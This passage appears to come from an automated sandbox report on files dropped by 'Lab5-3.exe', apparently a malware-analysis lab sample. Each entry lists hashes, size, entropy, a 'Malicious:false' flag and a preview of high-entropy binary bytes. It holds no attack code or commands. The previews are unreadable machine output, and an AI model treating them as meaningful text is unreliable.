                                                                                                          SSDEEP:48:sjYfwD4l8pl6H3rUmmGHfUTid3hBaUoSGFcmeykEdEElU92i:IYfwHple3QVZGx0uKeY2ElUJ
                                                                                                          MD5:37157F70D388289612D689299FDEC733
                                                                                                          SHA1:F07183F9AD6495C6551E7FA6181BACCB331E204F
                                                                                                          SHA-256:521C5A58DAB6E98D9B22DE657AA012808862C2F7477E4058C702EF0000848FFB
                                                                                                          SHA-512:797F31F8817B86D784369D2ABDBD6839B73A55245C4A0B43D73604AF59F92C838AEC104C92B99E86793ED03DEC0E5894E47D6FBBC8FD5EDE036C4AF8393BA128
                                                                                                          Malicious:false
                                                                                                          Preview:.*.1..)........#"...5...&...Se.].6I.7..J....R G..r..7..[....).hP..6.*..7.9....t.../.2..!.:s.....9.s.......y..ylg....7.[[......8.Y..$.r.FK.....z......M..l...._C..e.u...WT........|.gZI.S.2...4...~n@...A5S.` .M....%)}..;........q..N.C.[\...2..d..[....5.J"....z..Z..l.@N.V...h....}p.0..MK.E....W..y.....s..x.|y%za..d.C.n"...L.].Z.....Q....}.N:..S7.<G-....!....3M......\^.:...+.>A.j.%WO.}.O...B{`.........).......U......z.|S>........Z...W...#d......y/.....v{.....5Xe:.q.H..s.....8..5.[...XUc......b...._..G..vh...V|.|....ZSK.so.`?........E=..Q?.O..nI=\.Al..n..u./.}f.L.....\.S..|.\3..:..y..#6..n....tr..<.5l.-FN......,4.>....g.....ou..N...L`=.s.]T..V(...+....xzw*..:.`$.]...K{..n.f..Hk7M..=@.].k..m.p.u...Z.@...J..>..X...5,C;.3O..... q1.&.~_.i.I'..d...;......rH4.Wi..G[..:Y.....)..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.932144665895862
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ltuvrrybraiKmB1AzNQJoEP6uWEmXYsxGoLIHfUTid3hBaUoSGFcmeykEdEElU93:lGH8UmBq5kNmXYsTGx0uKeY2ElUJ
                                                                                                          MD5:19CFC1C294010E60BDAE1DD8E0B29A04
                                                                                                          SHA1:998DEC537FD81BDE56FAA586332F9843B47339E7
                                                                                                          SHA-256:17AD3E317D09AAA29540DA66CA089487D0786FEF70327DA47FDF18A45EC0F436
                                                                                                          SHA-512:A9ECC1E0D0FBB6C219EDCDA854B77F16BE0B853EF0B64C15049613B1D2655CEB5EAA4DE0B677CB24BC9B0EF42680F07673C8EA653188986F1689529FA63C9C5B
                                                                                                          Malicious:false
                                                                                                          Preview:4.....50.K..^.{....`...\...<i...B.._..4.&.w.g8}yH]....5..\K...;k. T..#/b..m....?E".!1]HR..DI....ir.......B6..GJ.b.,F..A...C..Z.....+.O..4..kR.^...5.ua..RC.........f.....Y.\N:Qdef.;....V...._..Am..u...^..p.)....9....9q.2.?..9..}..{...<a.n.Sm.f@..D.<3.u[.3..XX..0,..C.)..........S<g.1.J.>.pM}G.v.T.f.|o..Xp.< vw..='r.t<*p.-.......q.r....?f..W[O.ZD...e{.V......1...o..c._..$K....._S.../ho..%ai..,..[U.0.\..A*....Z.Q.....MAa%....J3.E.23.|.J..gz9..3..O./........#..^.~.i..U..D{.IL1.\.....q@<,#./....\.GG/?q...f.T..7..A...M...8...R.d....D! ..IFD.`b..*.Nx.'..$......g8...n.R...m. .a...'a..*@/v.......pf...,EO.</..e.s^D.6F%.V*"i.F..h,i#0....#...r`1M.!.ra.S..w.8~d..Hz3.PW6.Xx3..7]l..Gm....X.D]h..iI"<..V..Nh4.G.......R..f.j....v.......#.m.*..[......O.v..b..S.4..0.E.Ea.,.e6$y'.S..6...^f.*v!..vI%.HloL.R/..AF...q>P_.../-_].&...|..8.....w/c.2.k...l...GcG[r..E.Q/.I.z.=..6x...h.Jp...`.l.k..h&].,k....g....4.3d..p.V. v.3..+.xW.op.x&.U..$....*u..&$w..v_..P..:......a...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.926501009629037
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4NqZYO5KFr2Q0ToTXfjxLNJ4YqnG1HfUTid3hBaUoSGFcmeykEdEElU92i:4HMKx0UTXehnPGx0uKeY2ElUJ
                                                                                                          MD5:A9A78382C8A3166E5C79154B8E66D22E
                                                                                                          SHA1:A9FA1BE1C1626B3556BD2556CA43864AF633067C
                                                                                                          SHA-256:F2EEADABB77A8055F5AAD1A726E04F9F19C6532478E0269F05A61FA51F4EFA53
                                                                                                          SHA-512:1FA10EC1C65E59514EF1DE316F4D7CD3E49E9210558A6E074FDCE1E1B2AF75BC58E606BA7F4588FB659C63E1A31F6232767FBA7C9A497D085DF44BF15AB2E2FD
                                                                                                          Malicious:false
                                                                                                          Preview:.K3h/.7w......ucZ..p....t.P.....P...FA.q...\L...#....V.~..@....%*.....SH.."F#.~....<.......L..2z..1w9.$....d.&{..I./.q.D.*..>...3.g.....E,'................e.njo.W..h.e............!TWV.<...6. .V..9Em...fh..g........e/T{Zs..._.<>.k.N{.E..>PI...p.n'.C-d...~-.gY"Ln.+....7.f.^:$*.....!.I.?.=(o...<[d...}.5...9..G....:.`..Y.ut..,.]-..\..E4q....kO|.).0..-..........eD{...w.`.../,..k.n^Tf.0.:Fn...!.....)..D.d..4D..7`....}.KG<.....q..,F..C........6z.....B....ME.l.+..*p......}..2.Q.."H.P...q./.........(..w...7.Nc.o..3.F&.?.H.kc>V.Y.....?!*y.w..KP..`....s@....zK;<B....5.a.(...B....`....k-IM~.S.5h..d.(..A...'...1.7=S..Y.g..}.............y.V.i....|GARSXe.o/..2.:2..?.....N.)...8X....4l..{..9....;5:>o.u.C,F.*%Ul...j) .3"..=...B8k&t.ZC@W".ig..G>... ..B.....P..K....&_...;..V*...k+...g........v.\....:.h....G..f.X5.|.....lV.'...d.[....}`....$".x.../.4s.u.b...8"..J.\...S..F..L?S.Q........X"..#S......^...P.P.S(+.LVJ[*.G.....f.(3`.s....J.r.u..f.;oW..D.J.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.93304221794833
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8iSZasf7QUQCjvMsm5E99+JfI7E493jHfUTid3hBaUoSGFcmeykEdEElU92i:Eay0UDM35EAf549AGx0uKeY2ElUJ
                                                                                                          MD5:7CB0127600C1FB5D7CF947431E1EBF23
                                                                                                          SHA1:F61A89909CE7B54E3731218D8AEB1387B4AB1DE2
                                                                                                          SHA-256:CEE819C779B614F2C596C8CD2D85582EFF6A5EB935DAFBE9F8FC2B42CD99707B
                                                                                                          SHA-512:CCDCD5F1F369E56E86D8CF5CC8E1013718C23F2DD86D16B9C55F8A697177A38F802B4F64AC826AFD036A92D2981B919639C7BF6F6D2D38ACC2FFABA3AFB22105
                                                                                                          Malicious:false
                                                                                                          Preview:.L`..T.E.w}G...c.=..*....x..o. .(p....N.n....f#.......C.y2...5.z`0..........gxyE.3.$..........M{..g..s..z.7.6:...W8..M.....:wH3..1..b......_...,.]<.&'..9....[.h.....1.Z+F..3......mx)=..`...sH._..h.........8...(...@.....B`..4wL..V....W..._.......=.I.b.@......{..3...=;.`w.-.C9v"...n1.rr...V..C.=.. ...L..../7.U...FusT...O5...f...s..J.P.9.........l.].."....(.b.M...|.d...j.w*J.aL.....5..7p... /...w;z../Ah.:......iB.N....]....N...,.a.5._..Fn4.;....2w.2."`.2..$.I.#9...4K....Qa...H6kg..5-...9...-.,..........].A...n..Pe..4....\{.T.....#.......O)...X..L...edv..}..-..MT@..zd5...o.!.7..C...-Z....L.......,g..s..lz..[m..\S.K\kZ&[..H.C.J.GYI....=%......croWc.Y...+.i....A..J.(.....|..l.&.1.^.....4j9.Ux....8.K......N.(..:0.}........4ZD[.B{...;..`r[...'.d..O$..-. ..........<.$J..[....#`.....B.?.^...".....'....S...s+={-..,.^J.Y.O.....4....F.:....E..vC...W..?...f.NL$..........'..0w.K_.*.&*.....'y\.|;........H.%....x.Z.M...7.......).a..wa.....8U...)v...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.940309269286524
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:EUWvvRQ/CfR9eykZfAII455KzrgnMCWHfUTid3hBaUoSGFcmeykEdEElU92i:4vdWyk+455orgMCpGx0uKeY2ElUJ
                                                                                                          MD5:9CDB4EBA0E273A5A6E7A5E243402AFF3
                                                                                                          SHA1:E32EBE13585AE686CDC12DA97D52B468A839AD43
                                                                                                          SHA-256:06FECA782C73A77583605C5882A93DA766BDF34C62D2F71EEBB60343D263C939
                                                                                                          SHA-512:D70B03AB4EF2D6CB7283B8A20B4E590BBDABD4B024D2EEFE299279D284112ACE899F16499C515C4A28900AA93DA57300294ADDAF9E1A2A1A4E360387F396C722
                                                                                                          Malicious:false
                                                                                                          Preview:_X..=..S.4..OD.]...L.V.C.._.....W.:.?.K=J..!..!y..%1.9E..u...w.i...5...a]...ri%g"..Q.......@..6...Y)<F.m.s..;..2!....>. (....E.^.6...*7D.....4.#..hOP.B....=.1k.....-.E.|..Q...B...Zjg[.Ltg.0L.Y...<..S.L..}...N.7.....s...X ..4....2....$.c...jY.9.c.a..,...&....f..Z.....|.JR...H..7h...A......k6".......rP.<..].K.}4.L.AG.e........#..<'..$....g'j....H.r..y.;.!.x....4..U.&.Rg..0_.T.Bvu.5.,o8cqA.lS......y....Y..._.]..yI.._.IN].J:+7..:P..i.......N...+q..].........9n;\(.........rR......uU."..NF.I.y`.K..!.../.p.....F...<.(1...f1...4..=.......(`N..3h.n1Q......-l.u4.voV.58..._....g.......'..6.d..."....:..c..CD..s\.).U.:....`..~.8a.zx?...0[..x...0]OzlL..k.$0|.5..T......1..7...'...#...l..`...e.z.`.M7f>...2.*.9..d.....+.0...Dl.$..k~.&..X.U..p....*N.......'..}.wZ..c'.......ZI.&1..:..p....<.mH7..y?./.....2..._.^!..H{:.2l...;ng.p...{D.~..Bf.q.'-.]..2.E...2. w...*..\p.........S......._.0&;6..s....Re..i>ED.bY'T...|G;..(..p...z.<.....a).R..*...L...%~' Z...ES..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.9258486313839756
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:AiYvOVXusmqPqK+Tf/WElDiwkY5edFCRXaqRRGZHfUTid3hBaUoSGFcmeykEdEE+:XfVXVmqPt+T/H5eMR5Gx0uKeY2ElUJ
                                                                                                          MD5:7E53244C2327038A5A9D6917B34C4831
                                                                                                          SHA1:27D452106B6DEA67A7646865FE6C3294D2B85BF4
                                                                                                          SHA-256:645BEC822781F0F6DB72E5766DFB4B2641981ED3E340D6DFAD22879E6586B144
                                                                                                          SHA-512:36DF255B3F5C4BA1B0147338084E70BECA2487D3A291085EB28CA2B980BF454747771B5FD3BC52C253CCE85E51F903CCDDD7BD8A616AD1260E0F9907308D6873
                                                                                                          Malicious:false
                                                                                                          Preview:...*3.+.@m....=?+<.G..............G.....aD.I...Q.;..2..}.pH.Tq...`..8.DT..L.....1X....E.`.A@....\.]....F..b...v=7..Y.Z*....7`..sM....3|..+.T[X.. ..4/..[......<.[.]....W+B&..5.k........._Z.E.~0.p.....2F^F.i.&.X.(...i...Y..5._<.f......0.k..Ap...{.d.........2.&Qv+...U./......>.6..#.....`.....g..`#3\1.B..<q..]..8h....6.'.D..0-P..M\...JN.L.ZI.......u(B.p...+..4>.0.....).I....z.@~..[....)G..<J.y..*.>.FG.lr..[eP..B}..:......./.Tj.:.+x.....0v.b.)E....3i6..v=Y...X..c..O...V....L.Zi0LZ*]..H..bi.@1M...1..e.1W|T..0.D...1.lG...>..P.V...../..s._.x...Hb.d..h.3..0...U.z..~M?PH.......S.5mA..~...zF..9.F..0...\,f.Ot..v.\JS.1.M.X..W.....,.]I.U.u...EB...g.N`...T.).#.I...........g....W.'.0U..L.".v.!.F.....H.~Q..%'..XP]XpY.{......Y"i.2:.(.5....hW$..0pm..~...8.........L"Lj{ .'(..i.VZ..6k<...r.h...q.W....f.t..7.X;...]..............O.bM(...5.Yr.v.cn.7..$.\@.j..L....NF......}...B.....jt...v,.l....#n#3.....}......:W1.Ya.<vNf....4...s..Y..f......./K.O...*..4...vH..`JZA
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.926019574010197
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oNA5zCERUE9Qy1SvTcxL605rGNOtGg4XJHfUTid3hBaUoSGFcmeykEdEElU92i:oN5MUWQy1uTim05diKGx0uKeY2ElUJ
                                                                                                          MD5:25C5897815C3EB76B69376D326B91B3B
                                                                                                          SHA1:2E89B4995D858C1759C00BC54B3E4BABC2F1F8BA
                                                                                                          SHA-256:F5DA5539014275D3A765F7CCFE7E6E7D7B0365C9B3895F694CA2A8A9F09C6059
                                                                                                          SHA-512:853E43718A1E0DDA2A6BB8D5AAABA27352A3D5D4EA0F186E2BDD454147117FE991F9CC7828761ACC045EF79FE6937DBC82BCED47829D8ED79B0BE05A2BA7DE73
                                                                                                          Malicious:false
                                                                                                          Preview:.&H.. ..06A.....i.....0=.)@...n.....:..i.....e...Q..bn.R....E..(D3...h..O..nL...DX.scB.,".W2b....6.Z.....v.^}...vR..i.(...!(..~wTM.E............{..o..^NK.N.t..l]...`..&..h.;.yUeh...."k.q..ka..u....l.!/.e.<...........M....=9.....qiq...x]?..RU......T=.8.%c!R*n....SN6.VA.....$.....N....k.W...<w..^.F.i..sQv...~..p...).....H..N..R.=X.....N.#+v.).=4..I.[T.....T..Q>.h....`..d.u|....P..E.....v..V.A.o...'.....W..K..@.....92B..n. /...IQg}....?$..mO..J1....ucLX2..6G}?V..}z'.....s..]..,...@j-..Q.h.d.....K...c...d..,UG.#n..A...Wv....HpS..m.*..z..p.~..&y.f......MBv.E."..42-...D...B....4,....;.....8..%.;..E+.e..<.x..J4.."......l)........:..1...h..9......j3,.N0.........aG.....X.`...*....L..-..!.P.....:.......~bec....."..M}d.....p..K.......f...m...........0..M..&.=.nV=.-M.......U.8.R...]..H.J..M.h4.vi.-....I.g.....g.fxo...9(.XZ..{.L|.m.h">.tw..,v.H.IH18........u.....i.E.e....P....Zb.B.<.)+....k10..H.g.N..(G...B.Hq.r.y: dQ...@..6..2..xMf.!s.Al'Y..6.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.931972162324142
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5OaSuzbIOhYRTZgGminQWorDxeH8HfUTid3hBaUoSGFcmeykEdEElU92i:1S4pmTzrQHxebGx0uKeY2ElUJ
                                                                                                          MD5:5B79288810F7598A726992E8308A7953
                                                                                                          SHA1:1FB00CDCF19ECE3AF0B040DE8BF800E4A6254136
                                                                                                          SHA-256:97D702CEA982E78C4A3A7E860E754DA58248945472F6056FDE345A5A5AAF2A64
                                                                                                          SHA-512:4D1DE3F007C14C360A18C1B417A6771EF0FCF7EEBE4870B65A0C16821F646431DB631A09CF8404DE9D53DA1AADE187DDCBCE0F7492E06FBEBAB18B64AC304E16
                                                                                                          Malicious:false
                                                                                                          Preview:....nG"T.n!...j......qg......I..MD....:.........?Ml.pq......{]H.{...D_{:jjRg....B..?..`/8...vS..i...C/z.e...WH5.T8)...".....F..ubq.....Ey$.)..e#=.ku.7.G.........t...Z...G.Uer.... ..........$.*..'n%a.o...c.x.C.J8.8..I*...1...X..6...d.:.YYE..]O.@..$k.q.8....@T.%..ijT..kg...d.f...K'r..=~..D.........a.*.2...&....h,...7..j0...J.!...[..sa.l}j....=..|...1jx|.'..*....`R..F....Q...Xgs...B.)...?n8s...y....@+.B$......R.....].SW.-...f\.i.....W......|wl@....Jc...o....`...oqj!..%?T.qA.^?.R).A/;c.6....N.U.......P.-Y...*.W.%.......&.^..,.nc..s..yp~.=q...Ji.bi.....Hvks0`.3.$.^..G..xm.H..K&...\}.....i..WI}.x....._...c .....}-D`.O.U'v...n.S).N&.].V.}..|.Dm.....?..X.y..E.{^..Tk..8?.>L5\..]...6.$....anGm..Z..p...>..6~Eu.=5.......B.(s.Jh..<y.~k..aT...$.<..W...8..(.g.....O.....(..U..D...{O..A..>..8D..\l........H.......bQ.w.P.<...l}+...&B8..N.&I.3...Qi.4..L.-8.Z.x...NW.[...$..m;...G.@F.>..?2]..PruE=.~.. o.j..T..*eM...,+."?oe.r..{X\eR..O6{..1Sr..&.....u.....p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.933761897802197
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HppeM7M6EjwH13b3qMDnRtYCj3uv3YynQnHfUTid3hBaUoSGFcmeykEdEElU92i:JwJ6xH9baOnnYCjjyn/Gx0uKeY2ElUJ
                                                                                                          MD5:E2C5DD74036D67E26EA220B46986D843
                                                                                                          SHA1:FBDA963BA84C116F871E7064138C8032DE98EDCA
                                                                                                          SHA-256:BCD63C5C3EAF2EAB9F805ACF7720C85DCF57512081423BAC9DBF4FB90EB2A354
                                                                                                          SHA-512:46DDD101BD55A598DA6441739A50DFAFB8BDF414F692498417FEEE42C0229095681992BA2C3D7A31F99871CA295E703415D13EEE8624C1250782B1EB7FFD7FE7
                                                                                                          Malicious:false
                                                                                                          Preview:$...:FB......d,.I`....!..)n...L\.1VqKjn..wM..D..F.........5..!........7"i.S......m.;.N.y..M....P...3./2.o..S....~.....>.~~.O....:4..9,..E..G....TLQ..R..mw.a......Y<....pCS'......z....-.2M.5j.]...6.0SN..6E..#.....x....7.^J1..X.I..i*iQ...bj.9.Qh#T.....?z2X@.......O6...!}...K.....A.:Q.4.9.BO.-..OY0.{Y(...s...a...T5..5.Q.5..v.....(|........<.@.n.....mL).a.z.b...........`...5.eVI..u.j.H..(.=.+kV..~..>.....o..|.%......h....Qq..g..0b...Z...xH........*.....%..!x..O......'...,1.[.?.......Z...9i...b.$.F.0.m6.b[lK<.<.j0.AN....i...d...nl..Un,...........z..R.Qvo.......`..`.n.5.8.Ma..Q.Sa...Ee..4-,k.....*.]....*.^e..G.}\d.>$sJ8....O...a=T...QkpKI9~."....Ao.\[.o..rI.QB......x.|..........!...Dh<...w.k!D?9KW...@..Q.y....R.#&.P......e.|T.%.h.H2y..l~8.L..*=...[.9.......k$.P.>.2\..1.......i.s'.t].A.^>.6h.KY.....F;DT......BqO.....P..cg$..%......p..#J=..b./.....q+.5........l........_.]..9w..C.e.}t..`.q......E.....y.o."...g...G.'..D...$.c...I....n.]./..d...)j....&?.b.3.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.935770422370769
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Te2BH2wUGOxH5ROqQbntpzFPBAqHfUTid3hBaUoSGFcmeykEdEElU92i:TE8pTAGx0uKeY2ElUJ
                                                                                                          MD5:4AF2061485FBC362B79A5A06C026B197
                                                                                                          SHA1:7D9449BA8B15F24BB6A2DB7E077C32DDFC4913AE
                                                                                                          SHA-256:10E337800620FB53885F02C2E1336ED0892898A8A1B251935D236FFE66A2BC8E
                                                                                                          SHA-512:B90E9DED893530750BF524D36FE7174BB511B2E11DC7CE0B90853286F516967EBB6152A18DBBBCF34C81233F4E54832587B93030037BECE8FC8FC71A69773ACA
                                                                                                          Malicious:false
                                                                                                          Preview:[.WD.)b.:..-.......N#..|.pIV...Yo...Dmi.H.q......mJ.'...!.VWb......e)U.'.@..z.`Ml..Jh.nM..*..z...C...|.Fx...D.8.5.....%.....I.p...l...."-...."........U|...[...pl..p.A.q...3.....1..p..P..&..wjY..\x...p.z. .E.q.w.,xP}.H.....1......F....u?..7.H`....../.2..Md..=."......2..b....[.....gn..)....g...{....?v.X....F..u@..we.".}.yh.G.GM........Q...v.i[.5z.BY......hbc...yrqv..z.....V..A..9...4.y.a.Jg..u.!..d%C.,...0...N.......1V./"..jvr`.B'r....;..j..m.n0..t..R......3..$bU.aA..JM<y.+.j..a.s.^m...(.Q..".l.....F.&.....=....O..F.E3S.f.E.k<...B.o..h.gk,f..B.Vo.6...v.h......'"..T.cF ...Q.}......6u......n..).........E.e(dT.B...V.`.....2$49.R.0...m4.........EM......0.._c..".z.x....D.....B..<.!.T.l....v2..i...o.....W.-.B...E;0tD......_|cI.m...q.\....]...c.$.w....?.4^........M.E..dC7%...e..XN^......O...i......O]...{S/.w..c".....9~...^}..?z..V..6..5.U....-....h..UU.....U..ij..}....H .[....Y.........~=H....7=,.m..G.tq[...qk.A...ce.bO../..5.~...R..y.L;6%.u
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.934514689775696
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xl/9BYnBuuWZIZsHB3skKHfUTid3hBaUoSGFcmeykEdEElU92i:n/jYnBsseGx0uKeY2ElUJ
                                                                                                          MD5:CFB172BEB163D6CFFD07806BADFA64BA
                                                                                                          SHA1:A69FCDB6A19A392D6B680A9E87D0EE51A89D33B0
                                                                                                          SHA-256:4FE342ED234F0AB7EDDC98A172074269230A03AF247A18AFCB9518C40570CCBC
                                                                                                          SHA-512:F13A76B743BA75F8121DBA90397246A1113B808F14C0C4F99491FD50166834DEB68FBF3C41BFCC7CFD569A5CD3B7ABBBEE96B556144F7D7CF1FF6F1FA02C67A2
                                                                                                          Malicious:false
                                                                                                          Preview:...b.?q.6Py..j.....L.$|...5%..)gL.g_.N..:..H(/.%.9W@.{7...F'5......x.......n........ t.{b.|.?....&.l.V..>..r.)Y/..fs.6H"...........;R...A._.^#niC...#..Q] 0.y...tcx......8.....V..._.......6.....S@.fV=.....9C?0...%.,{.F.J.-oe`..sT.Cj..1...Z.G..d.......M....2=.........&.7.......|.^...#.A97\.l;..s."~e..{6...A\:C.I,/.GgC;r..I..u.PX......;f......0..nd.)..xC..$&../R0...`...l...I.4.U]/...g.^-.z.h.+...v....U.....U.B..D....M\Q.O[2.)@....(..9...;.....o;.J...W2Q_.4,c.".?h.v@... ..H|3.w.o..H.uv...O.......t.(.+@...c0L....&.N)[)E.....v.....<..f...m. !.WT.x..`..w..'zW.`#....#..^..-_..gP.)...6.Q.!...k..Wn).....$.if..L..pB...:1.y.5.+.}...3..Z....5..nO\..}...#.v..-....u.j..D.0..N..I/.EM.!..3~.I0Ej..L..M..[3.-qd.,..T.v.a.2....3.N.S.U}..} 75.JS[..Z8.R.C..8..};,.'.....$..g(.l*."m.j........GX.O..E.i..n.^..#LV...=.e=]~...H..sqr.W.p..f.BZ....1ha....F.~...q.eU.d..UOm.!...[.h......nn.P.zm.>=C..'.....l#.`w...t.R.z..~.8.M...`6s..f........_&9twd.|..}BLP.c9.,.zJ....R.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.93272878791813
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:84H/F17Pg24qrJdmC4+7pMDtWbYTCWD2s8HfUTid3hBaUoSGFcmeykEdEElU92i:jH9Ng2DJdJ7ukbYTbyoGx0uKeY2ElUJ
                                                                                                          MD5:3D3A50607E598A9F42DA02CD88F8EA9F
                                                                                                          SHA1:02F502198C8F296497AD8048CE24DAFE486A65CE
                                                                                                          SHA-256:F9A782E3C03781855405062054113AA2AF3628A268F0725FEEE2AFD31682C084
                                                                                                          SHA-512:521F8179D369D950676ECD7E9C3830519BC7E9CA54415ED7BB140B7D776C36A208F63CF517445AEB18D4B0ED39D68473628FD009001AA765531B37DDE4120B4C
                                                                                                          Malicious:false
                                                                                                          Preview:.....-......Es.6 ...._............UxlD.&.cY...WZ...m8...C..C.hI..J..o... 8....}+d..(,........XM<..".:.f.{...`.O..J.....*t..e[.b9..@.f.o.. .I....L...@a...F...+.;.....zp.s....D.v...n.]...6l....6......Y]..=`..H..}1...I...B!`A....C.F..#...f..!Xl..\..*......i{K......w@KMd.z.z..|E...Wf(i*....Ss.:..h^a.P..B.f....,FJ6$G.....7.n.2e..#.*..";...x......>..@F....#...H1~.fx1+...E.:....&..]"..`av...2..y....m..s.v>.P.S..iZ....3."!....P....z.....6.V.dA........l..q"...]K....u...0.......<.Tt..=.U...../.K..o"...tk.q.........q./?....dFH.Y].p51.9K.Z...^jC._d.....y.(...l.Q$......=./w....a$=....AU..$....or.A.@..Oc^z?....6..l.#/.../....s..3..q.a.^o...\"..Jm..;ED..OlS+s@n=(.......t [../wu.?cdq.h.."c.....S.......ft..0.(.`..$.k...~*p.-...F..Mo....Ve!....;...H..2N{.?.."...6......H......7...9QL.m. 7.fB{.....c..T.E..i[....8..a!."..W..1..l<...\\.@..."t._.....?...&..h....Y\..y!A....;......Y.SZ..X.5.74..lE=....QR.....{...1...H.$.C..O.)Q...q.86..o.e..../LZ...Z.NH?H.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.938274784849139
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Y5BDPb1Rq9BAa441K4FR6k4PQPzh9ERa/rQHfUTid3hBaUoSGFcmeykEdEElU92i:Y7DPbkBALgR6kZPzh9AmrXGx0uKeY2E+
                                                                                                          MD5:EDC98F02BEDF61E4DC2E63B95F7EA2D7
                                                                                                          SHA1:0C04871518B5CD72EE6BC7071365D3B89D6A289D
                                                                                                          SHA-256:058CB710249CAD2E9A341FDA7BCBBEFDF4EDC019B3E8E9E2E57298BC759EBF77
                                                                                                          SHA-512:BAADD09005D4055D74D8CE50B201D8A2A860CBFF59B0D398EFEF298AE3F1962EF39AAC33821F87979F4A07DDFFBA352A30F1AB4746A3FA3D8F39F7C27843E660
                                                                                                          Malicious:false
                                                                                                          Preview:..t.)..i.......7..`.Lc...v..._..[KX.F.(.}...8.o......M<..K.c.:{#z..G$~.].tf...G.f..'....VK.2.>......d....T:....m.L......<.T.ee..X...,.c.p..9...`5.Y...e!I}.[...H...@...../.J$....@.~.......Q..2.......luA....D.%....^.s...BHX.....j^%.P.....2/.....i...._.8.....GP.gY.5..._f'....l..G.......P.-.l.C...p.+....;...o<.y..4.b..7.....$).'...VsB.O..-Z/..1.....E.v.....N....F..6..#.......Y....B.....a.!..:R..m.b.C..$..].....^Ox...:..+.u...&`d..6n6....7...K...X....'...bK..P.....).N:.*..}..I.x.#.7..~1A.E.Nkq.z.Aa...v....Gy.wYB..x..[...s...l"..;!....}...J.........#K&....{D..9.;o...1.F..WYVz.?..n.. .(...j.~&.W.Uu_...3._g.`}C.i...g.....~Q..$....I.GK.o 1....LqN@.h.qs....v.U1..1....6.v.).b..0h.p..%....3..f.Z....4Vt(.d.r.py*..Q....,. .T}..3.i..3oe..Z*_8.S.o....5....s...k.O..Z..].c.u%.l4.."..4.N7]0.i...............J...~.}+.!"..qd.....D.....6......^..T.gr..hx.h..i.*L..vr..)Ep.x!..F....N..Z....S4..I..|..F..*".M.L_uw..;....1.........K.....]"6MdB.0m-(.4G[...-.U.._..T...._i.>..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.9434636149493745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fk71D1McUzWdj7aH0Hmj12MTHi6OCgrYaAHfUTid3hBaUoSGFcmeykEdEElU92i:fk71+cU2nXK1XDcCgUWGx0uKeY2ElUJ
                                                                                                          MD5:ED650B8E9ABB459826ED0F79366D7071
                                                                                                          SHA1:B881F3121D4A5536C39E90AE608C1ACC9F641F84
                                                                                                          SHA-256:FC3FE2842EB75ED09A00A34416649A960682F882BA48D757C995B35627A6051D
                                                                                                          SHA-512:EEEA7AAE8AAB2DC71DD912EB74E66813DD599EDD538D5C927760497ED90D0FF77C34D4B3CEA5B3D53033852225D987305477E50C2A9901121E94A6BA122A44C7
                                                                                                          Malicious:false
